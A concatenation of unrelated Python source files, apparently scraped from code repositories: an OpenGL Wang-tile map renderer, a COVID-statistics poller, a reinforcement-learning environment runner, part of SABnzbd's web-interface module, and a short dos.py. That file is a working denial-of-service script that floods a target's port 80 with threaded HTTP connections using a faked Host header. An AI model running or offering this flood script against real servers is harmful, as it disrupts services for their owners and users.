log_config.start_logging(config['LOGFILE_PATH'],loglevel=4)
test = PowerUsageService("",config)
test.handle_request("/PowerUsageService?device=1&state=On")
time.sleep(90)
|
tiled.py
|
import time
from pathlib import Path
from collections import deque
from typing import Optional
import numpy as np
from lib.opengl.core.base import *
from lib.opengl import *
from lib.opengl.postproc import PostProcNode
from lib.gen.automaton import ClassicAutomaton
ASSET_PATH = Path(__file__).resolve().parent.parent.parent / "assets"
def create_render_settings() -> RenderSettings:
return RenderSettings(
640, 400,
#mag_filter=gl.GL_NEAREST,
)
class WangEdge2:
TOP = 1
RIGHT = 2
BOTTOM = 4
LEFT = 8
STRINGS = {
TOP: "T",
RIGHT: "R",
BOTTOM: "B",
LEFT: "L",
}
# (y, x)
OFFSET = {
TOP: (-1, 0),
RIGHT: (0, 1),
BOTTOM: (1, 0),
LEFT: (0, -1),
}
IDX_TO_TILE = {
0: 0,
TOP: 4,
RIGHT: 1,
BOTTOM: 12,
LEFT: 3,
TOP | RIGHT: 5,
TOP | LEFT: 7,
BOTTOM | RIGHT: 13,
BOTTOM | LEFT: 15,
TOP | BOTTOM: 8,
LEFT | RIGHT: 2,
LEFT | BOTTOM | RIGHT: 14,
LEFT | TOP | RIGHT: 6,
TOP | BOTTOM | RIGHT: 9,
TOP | BOTTOM | LEFT: 11,
TOP | RIGHT | BOTTOM | LEFT: 10,
}
@classmethod
def tile_idx_to_string(cls, tile: int) -> str:
s = []
for key, name in cls.STRINGS.items():
if tile & key:
s.append(name)
return ",".join(s)
@classmethod
def get_tile_map(cls, map: np.ndarray) -> np.ndarray:
h, w = map.shape
tmap = np.ndarray(map.shape, dtype="int32")
tmap.fill(cls.IDX_TO_TILE[0])
for y in range(h):
for x in range(w):
if map[y][x]:
tile_idx = cls.TOP | cls.RIGHT | cls.BOTTOM | cls.LEFT
else:
tile_idx = 0
for key, offset in cls.OFFSET.items():
my = y + offset[0]
mx = x + offset[1]
if my >= h:
my = h - my
if mx >= w:
mx = w - mx
tile_idx |= key * int(map[my][mx])
# print(x, y, cls.tile_idx_to_string(tile_idx))
if tile_idx in cls.IDX_TO_TILE:
tmap[y][x] = cls.IDX_TO_TILE[tile_idx]
return tmap
class Map:
def __init__(
self,
width: int,
height: int,
preset: Optional[dict] = None,
):
preset = dict() if preset is None else preset
self.width = width
self.height = height
self._preset = preset
self.automaton = ClassicAutomaton(
width=self.width,
height=self.height,
born=preset.get("born") or {1, 2, 3},
survive=preset.get("survive") or {6},
)
#self.binary_map: np.ndarray = np.zeros([self.height, self.width])
@property
def binary_map(self) -> np.ndarray:
return self.automaton.cells
def tile_map(self) -> np.ndarray:
return WangEdge2.get_tile_map(self.binary_map)
def init_random(self):
self.automaton.init_random(
probability=self._preset.get("probability") or .3,
seed=self._preset.get("seed") or 23,
)
def step(self, count: int = 1):
for i in range(count):
self.automaton.step()
if False:
# smoothing the map
a.born = set()
a.survive = {3, 4, 5, 6, 7, 8}
for i in range(5):
a.step()
class TiledMapNode(PostProcNode):
def __init__(self, map: Map, name: str = "tiled"):
super().__init__(name)
self.map = map
self.map_texture = Texture2D()
self.last_step_time = 0
self.queue = deque()
#self.map_thread = Thread(target=self._map_thread_loop)
#self.map_thread.start()
def get_code(self):
return """
#line 160
const ivec2 tile_size = ivec2(32, 32);
const ivec2 tile_map_size = ivec2(4, 4);
vec2 rotate(in vec2 v, in float degree) {
float sa = sin(degree), ca = cos(degree);
return vec2(
v.x * ca - v.y * sa,
v.x * sa + v.y * ca
);
}
//vec4 tile_texture(int tile_idx,
void mainImage(out vec4 fragColor, in vec2 fragCoord, in vec2 texCoord) {
vec2 uv = (fragCoord / u_resolution.y);
uv.x -= .5 * u_resolution.y / u_resolution.x;
vec2 map_pos_f = uv;
map_pos_f = rotate(map_pos_f - .5, sin(u_time)*0.02) + .5;
map_pos_f *= 10. + 5. * sin(u_time/3.);
map_pos_f.y -= u_time * .9;
ivec2 map_pos = ivec2(map_pos_f);
map_pos.y = 20 - map_pos.y;
ivec4 map = ivec4(texelFetch(u_tex4, map_pos, 0));
vec2 tile_pos = fract(map_pos_f);
// when using bilinear mag filter, this is needed
//tile_pos = tile_pos * (float(tile_size - 1.) + .5) / float(tile_size);
//int tile_idx = int(map_pos.y + map_pos.x) % (tile_map_size.x * tile_map_size.y);
int tile_idx = map.x;
tile_pos += vec2(tile_idx % tile_map_size.x, (tile_idx / tile_map_size.x));
fragColor = texture(u_tex1, tile_pos / tile_map_size);
//fragColor = texture(u_tex2, uv);
if (uv.x < 0. || uv.x > 1. || uv.y < 0. || uv.y > 1.)
fragColor.xyz *= 0.1;
}
"""
def num_multi_sample(self) -> int:
return 32
def has_depth_output(self) -> bool:
return False
def create(self, render_settings: RenderSettings):
super().create(render_settings)
self.map.step(100)
self.map_texture.create()
self.map_texture.bind()
self._upload_map_tex()
def release(self):
super().release()
self.map_texture.release()
def render(self, rs: RenderSettings, pass_num: int):
self.map_texture.set_active_texture(3)
self.map_texture.bind()
if self.queue:
self._upload_map_tex(self.queue.pop())
#if rs.time - self.last_step_time > 1.:
# self.last_step_time = rs.time
# self.map.step(2)
# self._upload_map_tex()
self.map_texture.set_parameter(gl.GL_TEXTURE_MAG_FILTER, gl.GL_NEAREST)
super().render(rs, pass_num)
def _upload_map_tex(self, float_array: Optional[np.ndarray] = None):
if float_array is None:
float_array = self.map.tile_map().astype("float32")
self.map_texture.upload_numpy(
float_array,
width=self.map.width, input_format=gl.GL_RED, gpu_format=gl.GL_R32F,
)
def _map_thread_loop(self):
while True:
time.sleep(1)
self.map.step(2)
#self._upload_map_tex()
self.queue.append(self.map.tile_map().astype("float32"))
def create_render_graph():
graph = RenderGraph()
tile_tex = graph.add_node(Texture2DNode(
ASSET_PATH /
"w2e_curvy.png"
#"cr31" / "wang2e.png"
#"cr31" / "border.png"
#"cr31" / "quad.png"
#"cr31" / "octal.png"
#"cr31" / "pipe1.png"
#"cr31" / "mininicular.png"
))
map = Map(32, 32)
map.init_random()
print(map.tile_map())
renderer = graph.add_node(TiledMapNode(map))
graph.connect(tile_tex, 0, renderer, mag_filter=gl.GL_NEAREST)
return graph
if __name__ == "__main__":
map = np.array([
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 1, 0, 0],
[0, 0, 1, 1, 0, 0],
[0, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0],
], dtype=int)
print(map, "\n")
print(WangEdge2.get_tile_map(map))
#print(np.convolve(map.map.flatten(), conv_mask.flatten()).reshape([5, 5]))
|
dos.py
|
import threading
import socket
import time
target= "target ip"
port=80
fake_ip="182.21.20.32"
def dos():
while True:
stream=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
stream.connect((target,port))
stream.sendto((f"GET /{target} HTTP/1.1\r\n").encode("ascii"),(target,port))
stream.sendto((f"Host: {fake_ip}\r\n\r\n").encode('ascii'),(target,port))
stream.close()
for i in range(500):
thread=threading.Thread(target=dos)
time.sleep(4)
thread.start()
|
update_data.py
|
import threading, requests, time
from bot import log
class UpdateData(object):
def __init__(self):
self.unstable_req = None
self.req = None
self.results = None
thread = threading.Thread(target=self.run, args=())
thread.daemon = True
thread.start()
def run(self):
log("Update Data daemon started.")
while True:
self.unstable_req = requests.get('https://api.covid19api.com/summary')
if 199 < self.unstable_req.status_code < 300:
self.req = self.unstable_req
self.results = self.req.json()
else:
log("Covid data failed to update, response code {}".format(self.unstable_req.status_code))
time.sleep(30)
|
_env_runner.py
|
import copy
import logging
import os
import time
from multiprocessing import Process, Manager
from typing import Any
import numpy as np
from yarr.agents.agent import Agent
from yarr.envs.env import Env
from yarr.utils.rollout_generator import RolloutGenerator
from multiprocessing import get_start_method, set_start_method
try:
if get_start_method() != 'spawn':
set_start_method('spawn', force=True)
except RuntimeError:
pass
class _EnvRunner(object):
def __init__(self,
train_env: Env,
eval_env: Env,
agent: Agent,
timesteps: int,
train_envs: int,
eval_envs: int,
episodes: int,
episode_length: int,
kill_signal: Any,
step_signal: Any,
rollout_generator: RolloutGenerator,
save_load_lock,
current_replay_ratio,
target_replay_ratio,
weightsdir: str = None,
):
self._train_env = train_env
self._eval_env = eval_env
self._agent = agent
self._train_envs = train_envs
self._eval_envs = eval_envs
self._episodes = episodes
self._episode_length = episode_length
self._rollout_generator = rollout_generator
self._weightsdir = weightsdir
self._previous_loaded_weight_folder = ''
self._timesteps = timesteps
self._p_args = {}
self.p_failures = {}
manager = Manager()
self.write_lock = manager.Lock()
self.stored_transitions = manager.list()
self.agent_summaries = manager.list()
self._kill_signal = kill_signal
self._step_signal = step_signal
self._save_load_lock = save_load_lock
self._current_replay_ratio = current_replay_ratio
self._target_replay_ratio = target_replay_ratio
def restart_process(self, name: str):
p = Process(target=self._run_env, args=self._p_args[name], name=name)
p.start()
return p
def spin_up_envs(self, name: str, num_envs: int, eval: bool):
ps = []
for i in range(num_envs):
n = name + str(i)
self._p_args[n] = (n, eval)
self.p_failures[n] = 0
p = Process(target=self._run_env, args=self._p_args[n], name=n)
p.start()
ps.append(p)
return ps
def _load_save(self):
if self._weightsdir is None:
logging.info("'weightsdir' was None, so not loading weights.")
return
while True:
weight_folders = []
with self._save_load_lock:
if os.path.exists(self._weightsdir):
weight_folders = os.listdir(self._weightsdir)
if len(weight_folders) > 0:
weight_folders = sorted(map(int, weight_folders))
# Only load if there has been a new weight saving
if self._previous_loaded_weight_folder != weight_folders[-1]:
self._previous_loaded_weight_folder = weight_folders[-1]
d = os.path.join(self._weightsdir, str(weight_folders[-1]))
try:
self._agent.load_weights(d)
except FileNotFoundError:
# Rare case when agent hasn't finished writing.
time.sleep(1)
self._agent.load_weights(d)
logging.info('Agent %s: Loaded weights: %s' % (self._name, d))
break
logging.info('Waiting for weights to become available.')
time.sleep(1)
def _get_type(self, x):
if x.dtype == np.float64:
return np.float32
return x.dtype
def _run_env(self, name: str, eval: bool):
self._name = name
self._agent = copy.deepcopy(self._agent)
self._agent.build(training=False)
logging.info('%s: Launching env.' % name)
np.random.seed()
logging.info('Agent information:')
logging.info(self._agent)
env = self._train_env
if eval:
env = self._eval_env
env.eval = eval
env.launch()
for ep in range(self._episodes):
self._load_save()
logging.debug('%s: Starting episode %d.' % (name, ep))
episode_rollout = []
generator = self._rollout_generator.generator(
self._step_signal, env, self._agent,
self._episode_length, self._timesteps, eval)
try:
for replay_transition in generator:
while True:
if self._kill_signal.value:
env.shutdown()
return
if (eval or self._target_replay_ratio is None or
self._step_signal.value <= 0 or (
self._current_replay_ratio.value >
self._target_replay_ratio)):
break
time.sleep(1)
logging.debug(
'Agent. Waiting for replay_ratio %f to be more than %f' %
(self._current_replay_ratio.value, self._target_replay_ratio))
with self.write_lock:
if len(self.agent_summaries) == 0:
# Only store new summaries if the previous ones
# have been popped by the main env runner.
for s in self._agent.act_summaries():
self.agent_summaries.append(s)
episode_rollout.append(replay_transition)
except StopIteration as e:
continue
except Exception as e:
env.shutdown()
raise e
with self.write_lock:
for transition in episode_rollout:
self.stored_transitions.append((name, transition, eval))
env.shutdown()
def kill(self):
self._kill_signal.value = True
|
interface.py
|
#!/usr/bin/python3 -OO
# Copyright 2007-2019 The SABnzbd-Team <team@sabnzbd.org>
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
"""
sabnzbd.interface - webinterface
"""
import os
import time
import cherrypy
import logging
import urllib.request, urllib.parse, urllib.error
import json
import re
import hashlib
import socket
import ssl
import functools
from threading import Thread
from random import randint
from xml.sax.saxutils import escape
import sabnzbd
import sabnzbd.rss
import sabnzbd.scheduler as scheduler
from Cheetah.Template import Template
from sabnzbd.misc import to_units, from_units, time_format, calc_age, \
int_conv, get_base_url, probablyipv4, probablyipv6
from sabnzbd.filesystem import real_path, long_path, globber, globber_full, remove_all, \
clip_path, same_file
from sabnzbd.newswrapper import GetServerParms
from sabnzbd.bpsmeter import BPSMeter
from sabnzbd.encoding import xml_name, utob
import sabnzbd.config as config
import sabnzbd.cfg as cfg
import sabnzbd.notifier as notifier
import sabnzbd.newsunpack
from sabnzbd.downloader import Downloader
from sabnzbd.nzbqueue import NzbQueue
from sabnzbd.utils.servertests import test_nntp_server_dict
from sabnzbd.decoder import SABYENC_ENABLED
from sabnzbd.utils.diskspeed import diskspeedmeasure
from sabnzbd.utils.getperformance import getpystone
from sabnzbd.utils.internetspeed import internetspeed
from sabnzbd.constants import NORMAL_PRIORITY, MEBI, DEF_SKIN_COLORS, \
DEF_STDCONFIG, DEF_MAIN_TMPL, DEFAULT_PRIORITY, CHEETAH_DIRECTIVES
from sabnzbd.lang import list_languages
from sabnzbd.api import list_scripts, list_cats, del_from_section, \
api_handler, build_queue, build_status, \
retry_job, retry_all_jobs, build_header, build_history, del_job_files, \
format_bytes, report, del_hist_job, Ttemplate, build_queue_header, \
_api_test_email, _api_test_notif
##############################################################################
# Global constants
##############################################################################
##############################################################################
# Security functions
##############################################################################
def secured_expose(wrap_func=None, check_configlock=False, check_session_key=False):
""" Wrapper for both cherrypy.expose and login/access check """
if not wrap_func:
return functools.partial(secured_expose, check_configlock=check_configlock, check_session_key=check_session_key)
# Expose to cherrypy
wrap_func.exposed = True
@functools.wraps(wrap_func)
def internal_wrap(*args, **kwargs):
# Add X-Frame-Headers headers to page-requests
if cfg.x_frame_options():
cherrypy.response.headers['X-Frame-Options'] = 'SameOrigin'
# Check if config is locked
if check_configlock and cfg.configlock():
cherrypy.response.status = 403
return 'Access denied - Configuration locked'
# Check if external access
if not check_access():
cherrypy.response.status = 403
return 'Access denied'
# Verify login status, only for non-key pages
if not check_login() and not check_session_key:
raise Raiser('/login/')
# Verify host used for the visit
if not check_hostname():
cherrypy.response.status = 403
return 'Access denied - Hostname verification failed: https://sabnzbd.org/hostname-check'
# Some pages need correct session key
if check_session_key:
msg = check_session(kwargs)
if msg:
return msg
# All good, cool!
return wrap_func(*args, **kwargs)
return internal_wrap
def check_access(access_type=4):
""" Check if external address is allowed given access_type:
1=nzb
2=api
3=full_api
4=webui
5=webui with login for external
"""
referrer = cherrypy.request.remote.ip
# CherryPy will report ::ffff:192.168.0.10 on dual-stack situation
# It will always contain that ::ffff: prefix
range_ok = not cfg.local_ranges() or bool([1 for r in cfg.local_ranges() if (referrer.startswith(r) or referrer.replace('::ffff:', '').startswith(r))])
allowed = referrer in ('127.0.0.1', '::ffff:127.0.0.1', '::1') or range_ok or access_type <= cfg.inet_exposure()
if not allowed:
logging.debug('Refused connection from %s', referrer)
return allowed
def check_hostname():
""" Check if hostname is allowed, to mitigate DNS-rebinding attack.
Similar to CVE-2019-5702, we need to add protection even
if only allowed to be accessed via localhost.
"""
# If login is enabled, no API-key can be deducted
if cfg.username() and cfg.password():
return True
# Don't allow requests without Host
host = cherrypy.request.headers.get('Host')
if not host:
return False
# Remove the port-part (like ':8080'), if it is there, always on the right hand side.
# Not to be confused with IPv6 colons (within square brackets)
host = re.sub(':[0123456789]+$', '', host).lower()
# Fine if localhost or IP
if host == 'localhost' or probablyipv4(host) or probablyipv6(host):
return True
# Check on the whitelist
if host in cfg.host_whitelist():
return True
# Fine if ends with ".local" or ".local.", aka mDNS name
# See rfc6762 Multicast DNS
if host.endswith(('.local', '.local.')):
return True
# Ohoh, bad
log_warning_and_ip(T('Refused connection with hostname "%s" from:') % host)
return False
# Create a more unique ID for each instance
COOKIE_SECRET = str(randint(1000,100000)*os.getpid())
def set_login_cookie(remove=False, remember_me=False):
""" We try to set a cookie as unique as possible
to the current user. Based on it's IP and the
current process ID of the SAB instance and a random
number, so cookies cannot be re-used
"""
salt = randint(1, 1000)
cookie_str = utob(str(salt) + cherrypy.request.remote.ip + COOKIE_SECRET)
cherrypy.response.cookie['login_cookie'] = hashlib.sha1(cookie_str).hexdigest()
cherrypy.response.cookie['login_cookie']['path'] = '/'
cherrypy.response.cookie['login_cookie']['httponly'] = 1
cherrypy.response.cookie['login_salt'] = salt
cherrypy.response.cookie['login_salt']['path'] = '/'
cherrypy.response.cookie['login_salt']['httponly'] = 1
# If we want to be remembered
if remember_me:
cherrypy.response.cookie['login_cookie']['max-age'] = 3600*24*14
cherrypy.response.cookie['login_salt']['max-age'] = 3600*24*14
# To remove
if remove:
cherrypy.response.cookie['login_cookie']['expires'] = 0
cherrypy.response.cookie['login_salt']['expires'] = 0
else:
# Notify about new login
notifier.send_notification(T('User logged in'), T('User logged in to the web interface'), 'new_login')
def check_login_cookie():
# Do we have everything?
if 'login_cookie' not in cherrypy.request.cookie or 'login_salt' not in cherrypy.request.cookie:
return False
cookie_str = utob(str(cherrypy.request.cookie['login_salt'].value) + cherrypy.request.remote.ip + COOKIE_SECRET)
return cherrypy.request.cookie['login_cookie'].value == hashlib.sha1(cookie_str).hexdigest()
def check_login():
# Not when no authentication required or basic-auth is on
if not cfg.html_login() or not cfg.username() or not cfg.password():
return True
# If we show login for external IP, by using access_type=6 we can check if IP match
if cfg.inet_exposure() == 5 and check_access(access_type=6):
return True
# Check the cookie
return check_login_cookie()
def get_users():
users = {cfg.username(): cfg.password()}
return users
def encrypt_pwd(pwd):
return pwd
def set_auth(conf):
""" Set the authentication for CherryPy """
if cfg.username() and cfg.password() and not cfg.html_login():
conf.update({'tools.auth_basic.on': True, 'tools.auth_basic.realm': 'SABnzbd',
'tools.auth_basic.users': get_users, 'tools.auth_basic.encrypt': encrypt_pwd})
conf.update({'/api': {'tools.auth_basic.on': False},
'%s/api' % cfg.url_base(): {'tools.auth_basic.on': False},
})
else:
conf.update({'tools.auth_basic.on': False})
def check_session(kwargs):
""" Check session key """
if not check_access():
return 'Access denied'
key = kwargs.get('session')
if not key:
key = kwargs.get('apikey')
msg = None
if not key:
log_warning_and_ip(T('Missing Session key'))
msg = T('Error: Session Key Required')
elif key != cfg.api_key():
log_warning_and_ip(T('Error: Session Key Incorrect'))
msg = T('Error: Session Key Incorrect')
return msg
def check_apikey(kwargs, nokey=False):
""" Check api key or nzbkey
Return None when OK, otherwise an error message
"""
output = kwargs.get('output')
mode = kwargs.get('mode', '')
name = kwargs.get('name', '')
# Lookup required access level
req_access = sabnzbd.api.api_level(mode, name)
if req_access == 1 and check_access(1):
# NZB-only actions
pass
elif not check_access(req_access):
return report(output, 'Access denied')
# First check APIKEY, if OK that's sufficient
if not (cfg.disable_key() or nokey):
key = kwargs.get('apikey')
if not key:
key = kwargs.get('session')
if not key:
if cfg.api_warnings():
log_warning_and_ip(T('API Key missing, please enter the api key from Config->General into your 3rd party program:'))
return report(output, 'API Key Required')
elif req_access == 1 and key == cfg.nzb_key():
return None
elif key == cfg.api_key():
return None
else:
log_warning_and_ip(T('API Key incorrect, Use the api key from Config->General in your 3rd party program:'))
return report(output, 'API Key Incorrect')
# No active APIKEY, check web credentials instead
if cfg.username() and cfg.password():
if check_login() or (kwargs.get('ma_username') == cfg.username() and kwargs.get('ma_password') == cfg.password()):
pass
else:
if cfg.api_warnings():
log_warning_and_ip(T('Authentication missing, please enter username/password from Config->General into your 3rd party program:'))
return report(output, 'Missing authentication')
return None
def log_warning_and_ip(txt):
""" Include the IP and the Proxy-IP for warnings """
# Was it proxy forwarded?
xff = cherrypy.request.headers.get('X-Forwarded-For')
if xff:
txt = '%s %s (X-Forwarded-For: %s)>%s' % (txt, cherrypy.request.remote.ip, xff, cherrypy.request.headers.get('User-Agent', '??'))
else:
txt = '%s %s>%s' % (txt, cherrypy.request.remote.ip, cherrypy.request.headers.get('User-Agent', '??'))
logging.warning('%s', txt)
##############################################################################
# Helper raiser functions
##############################################################################
def Raiser(root='', **kwargs):
args = {}
for key in kwargs:
val = kwargs.get(key)
if val:
args[key] = val
# Add extras
if args:
root = '%s?%s' % (root, urllib.parse.urlencode(args))
# Optionally add the leading /sabnzbd/ (or what the user set)
if not root.startswith(cfg.url_base()):
root = cherrypy.request.script_name + root
# Send the redirect
return cherrypy.HTTPRedirect(root)
def queueRaiser(root, kwargs):
return Raiser(root, start=kwargs.get('start'),
limit=kwargs.get('limit'),
search=kwargs.get('search'))
def rssRaiser(root, kwargs):
return Raiser(root, feed=kwargs.get('feed'))
##############################################################################
# Page definitions
##############################################################################
class MainPage:
def __init__(self):
self.__root = '/'
# Add all sub-pages
self.login = LoginPage()
self.queue = QueuePage('/queue/')
self.history = HistoryPage('/history/')
self.status = Status('/status/')
self.config = ConfigPage('/config/')
self.nzb = NzoPage('/nzb/')
self.wizard = Wizard('/wizard/')
@secured_expose
def index(self, **kwargs):
if not cfg.notified_new_skin() and cfg.web_dir() != 'Glitter':
logging.warning(T('Try our new skin Glitter! Fresh new design that is optimized for desktop and mobile devices. Go to Config -> General to change your skin.'))
if not cfg.notified_new_skin():
cfg.notified_new_skin.set(1)
config.save_config()
if kwargs.get('skip_wizard') or config.get_servers():
info = build_header()
info['scripts'] = list_scripts(default=True)
info['script'] = 'Default'
info['cat'] = 'Default'
info['categories'] = list_cats(True)
info['have_rss_defined'] = bool(config.get_rss())
info['have_watched_dir'] = bool(cfg.dirscan_dir())
# Have logout only with HTML and if inet=5, only when we are external
info['have_logout'] = cfg.username() and cfg.password() and (cfg.html_login() and (cfg.inet_exposure() < 5 or (cfg.inet_exposure() == 5 and not check_access(access_type=6))))
bytespersec_list = BPSMeter.do.get_bps_list()
info['bytespersec_list'] = ','.join([str(bps) for bps in bytespersec_list])
template = Template(file=os.path.join(sabnzbd.WEB_DIR, 'main.tmpl'),
searchList=[info], compilerSettings=CHEETAH_DIRECTIVES)
return template.respond()
else:
# Redirect to the setup wizard
raise cherrypy.HTTPRedirect('%s/wizard/' % cfg.url_base())
@secured_expose(check_session_key=True)
def shutdown(self, **kwargs):
# Check for PID
pid_in = kwargs.get('pid')
if pid_in and int(pid_in) != os.getpid():
return "Incorrect PID for this instance, remove PID from URL to initiate shutdown."
sabnzbd.shutdown_program()
return T('SABnzbd shutdown finished')
@secured_expose(check_session_key=True)
def pause(self, **kwargs):
scheduler.plan_resume(0)
Downloader.do.pause()
raise Raiser(self.__root)
@secured_expose(check_session_key=True)
def resume(self, **kwargs):
scheduler.plan_resume(0)
sabnzbd.unpause_all()
raise Raiser(self.__root)
@cherrypy.expose
def tapi(self, **kwargs):
""" Handler for API over http, for template use """
msg = check_apikey(kwargs)
if msg:
return msg
return api_handler(kwargs)
@cherrypy.expose
def api(self, **kwargs):
""" Handler for API over http, with explicit authentication parameters """
if cfg.api_logging():
# Was it proxy forwarded?
xff = cherrypy.request.headers.get('X-Forwarded-For')
if xff:
logging.debug('API-call from %s (X-Forwarded-For: %s) [%s] %s', cherrypy.request.remote.ip,
xff, cherrypy.request.headers.get('User-Agent', '??'), kwargs)
else:
logging.debug('API-call from %s [%s] %s', cherrypy.request.remote.ip,
cherrypy.request.headers.get('User-Agent', '??'), kwargs)
mode = kwargs.get('mode', '')
if isinstance(mode, list):
mode = mode[0]
kwargs['mode'] = mode
name = kwargs.get('name', '')
if isinstance(name, list):
name = name[0]
kwargs['name'] = name
if mode not in ('version', 'auth'):
msg = check_apikey(kwargs)
if msg:
return msg
return api_handler(kwargs)
@secured_expose
def scriptlog(self, **kwargs):
""" Duplicate of scriptlog of History, needed for some skins """
# No session key check, due to fixed URLs
name = kwargs.get('name')
if name:
history_db = sabnzbd.get_db_connection()
return ShowString(history_db.get_name(name), history_db.get_script_log(name))
else:
raise Raiser(self.__root)
@secured_expose(check_session_key=True)
def retry(self, **kwargs):
""" Duplicate of retry of History, needed for some skins """
job = kwargs.get('job', '')
url = kwargs.get('url', '').strip()
pp = kwargs.get('pp')
cat = kwargs.get('cat')
script = kwargs.get('script')
if url:
sabnzbd.add_url(url, pp, script, cat, nzbname=kwargs.get('nzbname'))
del_hist_job(job, del_files=True)
raise Raiser(self.__root)
@secured_expose(check_session_key=True)
def retry_pp(self, **kwargs):
# Duplicate of History/retry_pp to please the SMPL skin :(
retry_job(kwargs.get('job'), kwargs.get('nzbfile'), kwargs.get('password'))
raise Raiser(self.__root)
@secured_expose
def robots_txt(self, **kwargs):
""" Keep web crawlers out """
cherrypy.response.headers['Content-Type'] = 'text/plain'
return 'User-agent: *\nDisallow: /\n'
##############################################################################
class Wizard:
def __init__(self, root):
self.__root = root
@secured_expose(check_configlock=True)
def index(self, **kwargs):
""" Show the language selection page """
if sabnzbd.WIN32:
import util.apireg
cfg.language.set(util.apireg.get_install_lng())
logging.debug('Installer language code "%s"', cfg.language())
info = build_header(sabnzbd.WIZARD_DIR)
info['languages'] = list_languages()
template = Template(file=os.path.join(sabnzbd.WIZARD_DIR, 'index.html'),
searchList=[info], compilerSettings=CHEETAH_DIRECTIVES)
return template.respond()
@secured_expose(check_configlock=True)
def one(self, **kwargs):
""" Accept language and show server page """
if kwargs.get('lang'):
cfg.language.set(kwargs.get('lang'))
# Always setup Glitter
change_web_dir('Glitter - Default')
info = build_header(sabnzbd.WIZARD_DIR)
info['certificate_validation'] = sabnzbd.CERTIFICATE_VALIDATION
# Just in case, add server
servers = config.get_servers()
if not servers:
info['host'] = ''
info['port'] = ''
info['username'] = ''
info['password'] = ''
info['connections'] = ''
info['ssl'] = 0
info['ssl_verify'] = 2
else:
# Sort servers to get the first enabled one
server_names = sorted(servers.keys(), key=lambda svr: '%d%02d%s' % (int(not servers[svr].enable()), servers[svr].priority(), servers[svr].displayname().lower()))
for server in server_names:
# If there are multiple servers, just use the first enabled one
s = servers[server]
info['host'] = s.host()
info['port'] = s.port()
info['username'] = s.username()
info['password'] = s.password.get_stars()
info['connections'] = s.connections()
info['ssl'] = s.ssl()
info['ssl_verify'] = s.ssl_verify()
if s.enable():
break
template = Template(file=os.path.join(sabnzbd.WIZARD_DIR, 'one.html'),
searchList=[info], compilerSettings=CHEETAH_DIRECTIVES)
return template.respond()
@secured_expose(check_configlock=True)
def two(self, **kwargs):
""" Accept server and show the final page for restart """
# Save server details
if kwargs:
kwargs['enable'] = 1
handle_server(kwargs)
config.save_config()
# Show Restart screen
info = build_header(sabnzbd.WIZARD_DIR)
info['access_url'], info['urls'] = get_access_info()
info['download_dir'] = cfg.download_dir.get_clipped_path()
info['complete_dir'] = cfg.complete_dir.get_clipped_path()
template = Template(file=os.path.join(sabnzbd.WIZARD_DIR, 'two.html'),
searchList=[info], compilerSettings=CHEETAH_DIRECTIVES)
return template.respond()
@secured_expose
def exit(self, **kwargs):
""" Stop SABnzbd """
sabnzbd.shutdown_program()
return T('SABnzbd shutdown finished')
def get_access_info():
""" Build up a list of url's that sabnzbd can be accessed from """
# Access_url is used to provide the user a link to sabnzbd depending on the host
access_uri = 'localhost'
cherryhost = cfg.cherryhost()
if cherryhost == '0.0.0.0':
host = socket.gethostname()
socks = [host]
# Grab a list of all ips for the hostname
try:
addresses = socket.getaddrinfo(host, None)
except:
addresses = []
for addr in addresses:
address = addr[4][0]
# Filter out ipv6 addresses (should not be allowed)
if ':' not in address and address not in socks:
socks.append(address)
if "host" in cherrypy.request.headers:
host = cherrypy.request.headers['host']
host = host.rsplit(':')[0]
access_uri = host
socks.insert(0, host)
else:
socks.insert(0, 'localhost')
elif cherryhost == '::':
host = socket.gethostname()
socks = [host]
# Grab a list of all ips for the hostname
addresses = socket.getaddrinfo(host, None)
for addr in addresses:
address = addr[4][0]
# Only ipv6 addresses will work
if ':' in address:
address = '[%s]' % address
if address not in socks:
socks.append(address)
if "host" in cherrypy.request.headers:
host = cherrypy.request.headers['host']
host = host.rsplit(':')[0]
access_uri = host
socks.insert(0, host)
else:
socks.insert(0, 'localhost')
elif not cherryhost:
socks = [socket.gethostname()]
access_uri = socket.gethostname()
else:
socks = [cherryhost]
access_uri = cherryhost
urls = []
for sock in socks:
if sock:
if cfg.enable_https() and cfg.https_port():
url = 'https://%s:%s%s' % (sock, cfg.https_port(), cfg.url_base())
elif cfg.enable_https():
url = 'https://%s:%s%s' % (sock, cfg.cherryport(), cfg.url_base())
else:
url = 'http://%s:%s%s' % (sock, cfg.cherryport(), cfg.url_base())
urls.append(url)
if cfg.enable_https() and cfg.https_port():
access_url = 'https://%s:%s%s' % (sock, cfg.https_port(), cfg.url_base())
elif cfg.enable_https():
access_url = 'https://%s:%s%s' % (access_uri, cfg.cherryport(), cfg.url_base())
else:
access_url = 'http://%s:%s%s' % (access_uri, cfg.cherryport(), cfg.url_base())
return access_url, urls
##############################################################################
class LoginPage:
@cherrypy.expose
def index(self, **kwargs):
# Base output var
info = build_header(sabnzbd.WEB_DIR_CONFIG)
info['error'] = ''
# Logout?
if kwargs.get('logout'):
set_login_cookie(remove=True)
raise Raiser()
# Check if there's even a username/password set
if check_login():
raise Raiser(cherrypy.request.script_name + '/')
# Was it proxy forwarded?
xff = cherrypy.request.headers.get('X-Forwarded-For')
# Check login info
if kwargs.get('username') == cfg.username() and kwargs.get('password') == cfg.password():
# Save login cookie
set_login_cookie(remember_me=kwargs.get('remember_me', False))
# Log the succes
if xff:
logging.info('Successful login from %s (X-Forwarded-For: %s)', cherrypy.request.remote.ip, xff)
else:
logging.info('Successful login from %s', cherrypy.request.remote.ip)
# Redirect
raise Raiser(cherrypy.request.script_name + '/')
elif kwargs.get('username') or kwargs.get('password'):
info['error'] = T('Authentication failed, check username/password.')
# Warn about the potential security problem
fail_msg = T('Unsuccessful login attempt from %s') % cherrypy.request.remote.ip
if xff:
fail_msg = '%s (X-Forwarded-For: %s)' % (fail_msg, xff)
logging.warning(fail_msg)
# Show login
